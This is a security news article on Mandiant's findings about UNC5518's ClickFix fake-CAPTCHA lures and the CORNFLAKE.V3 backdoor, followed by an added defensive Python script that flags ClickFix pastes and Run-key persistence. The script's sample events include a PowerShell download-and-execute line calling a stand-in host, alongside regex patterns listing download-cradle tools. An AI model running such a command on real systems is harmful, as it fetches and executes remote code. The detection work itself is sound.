Mandiant researchers have uncovered a sophisticated cybercrime operation where compromised websites are weaponized with fake CAPTCHA pages to trick users into launching malware. The analysis attributes this activity to UNC5518, a financially motivated threat cluster that provides access-as-a-service for other cybercriminal groups.
Since June 2024, Mandiant has tracked UNC5518's use of ClickFix, a deceptive technique in which fake CAPTCHA verification pages are used to trick visitors into executing hidden scripts. As Mandiant explains, "this deceptive technique, known as ClickFix, lures website visitors into executing a downloader script which initiates a malware infection chain."
The lure often works by copying a malicious PowerShell command to the clipboard when a victim clicks on the CAPTCHA image. Unsuspecting users then paste and run the command via the Windows Run dialog box, triggering the download of a malicious payload.
The latest campaign studied by Mandiant involves the deployment of CORNFLAKE.V3, a backdoor attributed to UNC5774, another financially motivated group partnering with UNC5518. According to Mandiant, "CORNFLAKE.V3 is a backdoor, observed as two variants, written in JavaScript or PHP that retrieves payloads via HTTP."
This malware expands on earlier CORNFLAKE versions by adding persistence and support for multiple payload types. It can execute DLLs, EXEs, JavaScript, BAT scripts, and even PowerShell commands. Mandiant noted that "unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types."
The JavaScript variant of CORNFLAKE.V3, which runs under Node.js, is particularly insidious: the infection chain downloads and installs the Node.js runtime to execute the embedded malicious code, performs host reconnaissance, and even attempts Kerberoasting for credential harvesting.
Mandiant also identified a newer PHP-based variant of CORNFLAKE.V3. This version maintains similar backdoor capabilities but introduces additional commands, including ACTIVE (heartbeat reporting) and AUTORUN (automated persistence). The analysis warns that "these changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures."
Both variants can receive commands from command-and-control (C2) servers, execute reconnaissance scripts, and deploy secondary malware. In one instance, CORNFLAKE.V3 dropped the WINDYTWIST.SEA backdoor, a powerful implant capable of reverse shells, command execution, and lateral movement.
What makes this campaign unique is its collaborative nature. UNC5518 is not solely focused on exploiting victims but rather monetizes its foothold by providing other groups with entry access. Mandiant highlights, "while the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups."
Groups such as UNC5774 (operators of CORNFLAKE) and UNC4108 (associated with tools like VOLTMARKER and NetSupport RAT) have been observed leveraging UNC5518βs access to further their own objectives.
To mitigate risks, defenders should:
- Disable or restrict the Windows Run dialog where possible (for example through the "Remove Run menu from Start Menu" Group Policy setting), bearing in mind that a ClickFix lure can just as easily tell the victim to paste into a PowerShell window, a terminal, or the File Explorer address bar, so this raises the bar rather than closing the technique.
- Conduct regular phishing and social engineering simulations to prepare employees against ClickFix-style attacks.
- Implement robust logging and monitoring to detect suspicious registry changes, PowerShell executions, and unusual outbound connections.
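As an added example that is not part of the article or of Mandiant's report, the Python triage script below runs two of the detections the list above calls for over constructed process-creation and registry-set events: a PowerShell process spawned from the Run dialog (parent explorer.exe) with a download-and-execute cradle on its command line, which is the ClickFix paste, and a Run-key value that launches a script runtime such as node.exe from a user-writable path, which is the persistence the article attributes to CORNFLAKE.V3. The event shapes, field names, patterns and sample values are assumptions made for this example (loosely modelled on Sysmon events 1 and 13) and should be mapped onto your own telemetry schema and tuned for your estate.

```python
"""Added example, not code from the article or from Mandiant's report.

Scans process-creation and registry-set events for two host-level
behaviours described in the article:

  * ClickFix paste: powershell.exe spawned from the Run dialog (parent
    explorer.exe) with a download-and-execute cradle on its command line;
  * CORNFLAKE.V3-style persistence: a value under a CurrentVersion\\Run key
    that launches a script runtime (node.exe, wscript.exe, ...) or a script
    file from a user-writable path.

Event dicts, field names and sample values are constructed for this
example and loosely follow Sysmon event 1 / event 13.
"""
import re

# --- detection patterns (assumptions for this example; tune to your estate) ---
RUN_DIALOG_PARENT = re.compile(r"\\explorer\.exe$", re.I)
POWERSHELL_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|"
    r"invoke-expression|\biex\b|frombase64string|mshta|bitsadmin)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
SCRIPT_RUNTIME = re.compile(r"\\(node|wscript|cscript|mshta|powershell|pwsh|php)\.exe\b", re.I)
SCRIPT_FILE = re.compile(r"\.(js|vbs|bat|cmd|ps1|hta|php)\b", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Public|ProgramData)\\", re.I)


def is_clickfix_paste(ev: dict) -> bool:
    """Process event: PowerShell launched from the Run dialog with a download cradle.

    explorer.exe is also the parent of anything started from the Start menu,
    so the parent alone is noisy; the cradle on the command line is required.
    """
    return (ev.get("type") == "process"
            and bool(POWERSHELL_IMAGE.search(ev.get("image", "")))
            and bool(RUN_DIALOG_PARENT.search(ev.get("parent", "")))
            and bool(DOWNLOAD_CRADLE.search(ev.get("cmdline", ""))))


def is_suspicious_run_key(ev: dict) -> bool:
    """Registry event: Run/RunOnce value that starts a script runtime or script file.

    CORNFLAKE.V3 persists through a Run key; the JavaScript variant needs
    node.exe, which legitimate software rarely registers for autorun from a
    user-writable directory.
    """
    if ev.get("type") != "registry" or not RUN_KEY.search(ev.get("key", "")):
        return False
    value = ev.get("value", "")
    return bool(SCRIPT_RUNTIME.search(value)) or (
        bool(SCRIPT_FILE.search(value)) and bool(USER_WRITABLE.search(value)))


def triage(events: list) -> list:
    """Return one finding per matching event, tagged with the rule that fired."""
    findings = []
    for ev in events:
        if is_clickfix_paste(ev):
            findings.append({"rule": "clickfix_run_dialog_paste", "event": ev})
        elif is_suspicious_run_key(ev):
            findings.append({"rule": "runkey_script_runtime", "event": ev})
    return findings


# Constructed sample telemetry (not real indicators; hostnames use .invalid).
SAMPLE_EVENTS = [
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://captcha-check.invalid/v -UseBasicParsing | iex"'},
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell -File C:\ops\nightly-backup.ps1"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater",
     "value": r"C:\Users\alice\AppData\Local\node\node.exe C:\Users\alice\AppData\Local\node\app.js"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "value": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        ev = finding["event"]
        print(finding["rule"], "->", ev.get("cmdline") or ev.get("value"))
```

Run against the constructed events, the script flags the first (Run-dialog PowerShell with an `iwr ... | iex` cradle) and the third (a Run key pointing at node.exe under AppData) and ignores the two benign ones. During incident triage the Run dialog's own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is worth collecting as well, since it preserves the pasted command even when script-block logging was not enabled.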
As Mandiant concludes, "this investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access. This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor."